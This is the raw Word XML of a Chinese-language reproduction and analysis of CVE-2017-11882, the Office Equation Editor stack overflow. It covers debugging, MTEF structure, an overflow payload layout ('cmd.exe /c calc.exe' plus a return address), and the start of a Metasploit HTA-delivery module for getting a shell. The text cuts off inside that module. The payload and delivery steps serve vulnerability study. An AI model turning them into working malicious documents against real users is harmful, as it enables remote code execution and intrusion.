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cve-2017-11882-漏洞复现"/>
      <w:r>
        <w:t>CVE-2017-11882 漏洞复现</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:bookmarkStart w:id="1" w:name="测试环境"/>
      <w:r>
        <w:t>测试环境</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="2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1373"/>
        <w:gridCol w:w="16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5"/>
              <w:jc w:val="left"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="25"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>推荐环境</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="25"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>版本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5"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>操作系统</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="25"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>Windows 7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="25"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>Service Pack 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5"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>漏洞软件</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="25"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>Office</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="25"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>2016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5"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>虚拟机</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="25"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>VMware</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="25"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>16.2.3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5"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>调试器</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="25"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>OllyDBG</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="25"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>2.0.1-32位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5"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>反汇编工具</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="25"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>IDA Pro</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="25"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>6.8</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:t>影响范围：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:t>office 2003</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:t>office 2007</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:t>office 2010</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:t>office 2013</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:t>office 2016</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="1"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:bookmarkStart w:id="2" w:name="环境搭建"/>
      <w:r>
        <w:t>环境搭建</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="24"/>
      </w:pPr>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> HYPERLINK "https://msdn.itellyou.cn/" \h </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="21"/>
        </w:rPr>
        <w:t>https://msdn.itellyou.cn/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="21"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:t>Windows 7 sp 1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="36"/>
        </w:rPr>
        <w:t>ed2k://|file|cn_windows_7_ultimate_with_sp1_x64_dvd_u_677408.iso|3420557312|B58548681854236C7939003B583A8078|/</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="24"/>
      </w:pPr>
      <w:r>
        <w:t>Office 2016</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="36"/>
        </w:rPr>
        <w:t>ed2k://|file|cn_windows_7_ultimate_with_sp1_x64_dvd_u_677408.iso|3420557312|B58548681854236C7939003B583A8078|/</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="2"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:bookmarkStart w:id="3" w:name="漏洞复现"/>
      <w:r>
        <w:t>漏洞复现</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="24"/>
      </w:pPr>
      <w:r>
        <w:t>打开exploit.rtf 成功弹出计算器</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="35"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5334000" cy="359283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932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bookmarkEnd w:id="3"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:bookmarkStart w:id="4" w:name="漏洞分析"/>
      <w:r>
        <w:t>漏洞分析</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="24"/>
      </w:pPr>
      <w:r>
        <w:t>我们利用process monitor中的Process Tree</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:t>可以看到调用计算机calc的是个来自office中的一个名叫EQNEDT32.EXE的组件</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="35"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5334000" cy="426085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漏洞出现在模块EQNEDT32.EXE中，该模块为公式编辑器，在Office的安装过程中被默认安装。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:t>现在来定位是EQNEDT32中哪个函数出的问题，我使用windbg的工具gfalgs</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:t>gfalgs工具本质是通过修改注册表中的DEBUG。如此配置之后，只要EQNEDT32.EXE进程被创建就会立即被指定的调试器挂住。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:t>直接去修改HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\EQNEDT32.EXE里的Debugger也是一个效果</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="35"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5334000" cy="545274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5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根据我们的exploit.rtf可以弹出calc，猜测程序条用了WinExec，CreateProcess之类的api，因此我们下断点，记得忽略异常，点击exploit.rtf，x32gdb自动挂起</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="35"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5334000" cy="3602355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在此处下断点</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="35"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5334000" cy="1939290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接着点击运行，此时程序停到了此处，我们查看堆栈调用情况</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="35"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5334000" cy="3094355"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr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948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我们用ida查看EQNEDT32.EXE进行栈回溯</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:t>首先的返回地址是0x430C18</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="35"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5334000" cy="1478280"/>
            <wp:effectExtent l="0" t="0" r="0" b="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78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再上一层的返回地址是0x4218E4，可以看到原来的这块地址并不是call到调用WinExec那块，说明被发生了改变，我们进到该函数里看看</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="35"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5334000" cy="1715770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158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这里没有看到明显的一处点，但是有一个sub_41160F函数，我们接着进去康康</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="35"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5334000" cy="931545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318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可以看到这里有个strcpy函数，没有校验长度，直接赋值，被复制的变量到栈底只有0x28字节</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="35"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5334000" cy="3204845"/>
            <wp:effectExtent l="0" t="0" r="0" b="0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52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 xml:space="preserve"> 我们利用动调去验证一下，我们在进入sub_41160F函数之前断点</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="35"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5334000" cy="2766695"/>
            <wp:effectExtent l="0" t="0" r="0" b="0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68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然后单步进入</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="35"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5334000" cy="2778760"/>
            <wp:effectExtent l="0" t="0" r="0" b="0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90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rep movsd(rep movs dword ptr es:[edi],dword ptr [esi])字符串拷贝,此时需要拷贝的数量为0xc*4 = 0x30 参数的长度超过了申请的变量大小0x28，原本正确的返回地址会被覆盖</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="35"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5334000" cy="2693670"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr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被覆盖后返回地址为0x430c12</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="35"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5334000" cy="2781300"/>
            <wp:effectExtent l="0" t="0" r="0" b="0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在正常流程return的时候，程序将跳转到这执行winexec</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="35"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5334000" cy="873125"/>
            <wp:effectExtent l="0" t="0" r="0" b="0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7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bookmarkEnd w:id="4"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:bookmarkStart w:id="5" w:name="漏洞利用"/>
      <w:r>
        <w:t>漏洞利用</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="24"/>
      </w:pPr>
      <w:r>
        <w:t>在文件中我们可以看到此poc的位置</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="35"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5334000" cy="2577465"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="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7781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我们追踪一下污点</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="35"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5334000" cy="2612390"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="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24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class name = Equation.3 我们使用olebrowse对它进行分析</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="35"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5334000" cy="4152265"/>
            <wp:effectExtent l="0" t="0" r="0" b="0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通过</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> HYPERLINK "http://rtf2latex2e.sourceforge.net/MTEF3.html#Introduction" \h </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="21"/>
        </w:rPr>
        <w:t>MTEF</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="21"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t>学习资料</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="36"/>
        </w:rPr>
        <w:t>struct EQNOLEFILEHDR {</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="36"/>
        </w:rPr>
        <w:t>WORD cbHdr;     // 标题长度，sizeof(EQNOLEFILEHDR) = 28 字节</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="36"/>
        </w:rPr>
        <w:t>DWORD version；   // hiword = 2, loword = 0</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve"> WORD cf;        // 剪贴板格式 ("MathType EF")</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve"> DWORD cbObject;  // 此标头后面的 MTEF 数据长度（以字节为单位）</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve"> DWORD reserved1; // 未使用</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="36"/>
        </w:rPr>
        <w:t>DWORD reserved2; // 未使用</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="36"/>
        </w:rPr>
        <w:t>DWORD reserved3; // 未使用</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="36"/>
        </w:rPr>
        <w:t>DWORD reserved4; // 未使用</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="36"/>
        </w:rPr>
        <w:t>};</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="24"/>
      </w:pPr>
      <w:r>
        <w:t>前28字节是一个数据流的头部，然后后面紧随5字节是MTEF头部</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="35"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5334000" cy="2741295"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="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13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</w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="4200525" cy="1720850"/>
            <wp:effectExtent l="0" t="0" r="9525" b="12700"/>
            <wp:docPr id="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r>
        <w:t>接着16个字节的数据作为标签字节结构和选项值</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="35"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5334000" cy="2278380"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="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再接着是一条font记录，</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="35"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5334000" cy="2316480"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="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67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</w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5334000" cy="1834515"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="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347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tbl>
      <w:tblPr>
        <w:tblStyle w:val="2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2277"/>
        <w:gridCol w:w="3941"/>
        <w:gridCol w:w="121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410" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="25"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>Description</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2277" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="25"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>Size (byte)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3941" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="25"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>Value</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1210" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="25"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>Comment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pStyle w:val="25"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>Tag</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2277" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="25"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3941" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="25"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>0x8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1210" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="25"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>标识这个font记录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pStyle w:val="25"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>tface</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2277" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="25"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3941" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="25"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>0x5a</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1210" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="25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pStyle w:val="25"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>style</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2277" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="25"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3941" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="25"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>0x5a</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1210" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="25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pStyle w:val="25"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2277" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="25"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>任意长度，以null byte结尾</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3941" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="25"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>“cmd.exe /c calc.exe AAAAAAAAAAAAAAAAAAAAAAAA”+0x00430c12</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1210" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="25"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>可溢出，覆盖返回地址</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:t>EQNEDT32.EXE在解析Equation.3 OLE对象中的MTEF数据流里的font类型记录时，没有对font name的长度进行判断，将其复制入0x28大小的栈空间时可发生溢出，并可覆盖返回地址。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:t>我们getshell试试</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:t>在Kali Linux上构造带有shell后门的word文件，并开启监听，需要提前准备好shell.rb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56" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="37"/>
              <w:rPr>
                <w:highlight w:val="none"/>
                <w:vertAlign w:val="baseline"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="52"/>
                <w:highlight w:val="none"/>
              </w:rPr>
              <w:t>##
</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:highlight w:val="none"/>
              </w:rPr>
              <w:br w:type="textWrapping"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="52"/>
                <w:highlight w:val="none"/>
              </w:rPr>
              <w:t># This module requires Metasploit: https://metasploit.com/download
</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:highlight w:val="none"/>
              </w:rPr>
              <w:br w:type="textWrapping"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="52"/>
                <w:highlight w:val="none"/>
              </w:rPr>
              <w:t># Current source: https://github.com/rapid7/metasploit-framework
</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:highlight w:val="none"/>
              </w:rPr>
              <w:br w:type="textWrapping"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="52"/>
                <w:highlight w:val="none"/>
              </w:rPr>
              <w:t>##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59"/>
                <w:highlight w:val="none"/>
              </w:rPr>
              <w:t>class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1"/>
                <w:highlight w:val="none"/>
              </w:rPr>
              <w:t>MetasploitModule</w:t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40"/>
                <w:highlight w:val="none"/>
              </w:rPr>
              <w:t>&lt;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1"/>
                <w:highlight w:val="none"/>
              </w:rPr>
              <w:t>Msf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Exploit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Remote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41"/>
                <w:highlight w:val="none"/>
              </w:rPr>
              <w:t>Rank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1"/>
                <w:highlight w:val="none"/>
              </w:rPr>
              <w:t>NormalRanking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7"/>
                <w:highlight w:val="none"/>
              </w:rPr>
              <w:t>include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1"/>
                <w:highlight w:val="none"/>
              </w:rPr>
              <w:t>Msf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Exploit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Remote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HttpServer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def</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="70"/>
                <w:highlight w:val="none"/>
              </w:rPr>
              <w:t xml:space="preserve"> initialize(info  </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="40"/>
                <w:highlight w:val="none"/>
              </w:rPr>
              <w:t>=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{}</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="70"/>
                <w:highlight w:val="none"/>
              </w:rPr>
              <w:t>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</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="42"/>
                <w:highlight w:val="none"/>
              </w:rPr>
              <w:t>super</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="70"/>
                <w:highlight w:val="none"/>
              </w:rPr>
              <w:t>(update_info(info,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'Name'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9"/>
                <w:highlight w:val="none"/>
              </w:rPr>
              <w:t>'Microsoft Office Payload Delivery'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'Description'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56"/>
                <w:highlight w:val="none"/>
              </w:rPr>
              <w:t xml:space="preserve"> %q{</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="49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49"/>
                <w:highlight w:val="none"/>
              </w:rPr>
              <w:t xml:space="preserve">        This module generates an command to place within
</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:highlight w:val="none"/>
              </w:rPr>
              <w:br w:type="textWrapping"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="49"/>
                <w:highlight w:val="none"/>
              </w:rPr>
              <w:t xml:space="preserve">        a word document, that when executed, will retrieve a HTA payload
</w:t>
            </w:r>
            <w:r>
              <w:rPr>
